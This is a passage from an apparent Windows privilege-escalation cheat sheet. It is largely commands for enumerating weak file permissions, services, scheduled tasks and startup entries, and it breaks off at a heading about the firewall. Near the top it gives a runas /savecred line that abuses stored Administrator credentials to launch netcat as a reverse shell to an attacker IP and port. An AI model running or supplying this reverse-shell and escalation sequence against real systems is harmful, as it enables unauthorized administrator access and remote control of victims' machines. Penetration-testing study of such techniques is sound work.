cmdkey /list
|
1 2 |
runas /savecred /user:DOMAIN\Administrator “cmd /k C:\Users\security\tmp\nc.exe -d 10.10.14.17 1233 -e cmd.exe “ |
accesschk – find writable dirs and files
|
1 2 |
accesschk32.exe -qwsu "username" C:\* /ACCEPTEULA |
Look for Weak folder and file permissions
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” accesschk.exe -qwsu “Everyone” * accesschk.exe -qwsu “Authenticated Users” * accesschk64.exe -qwsu “Users” * |
Look for running services and processes
|
1 2 3 4 5 6 7 8 |
tasklist /svc tasklist /v net start sc query |
Look for any custom Scheduled Tasks
|
1 2 3 4 |
schtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks |
Look for startup programs
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” dir “C:\Documents and Settings\%username%\Start Menu\Programs\Startup” |
Is Firewall